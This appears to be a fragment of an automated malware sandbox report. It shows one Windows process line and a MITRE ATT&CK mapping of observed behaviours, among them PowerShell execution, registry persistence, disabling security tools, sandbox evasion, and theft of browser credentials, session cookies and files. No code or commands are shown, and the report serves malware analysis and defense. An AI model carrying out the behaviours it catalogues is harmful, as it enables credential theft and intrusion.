C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Authentication Process

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion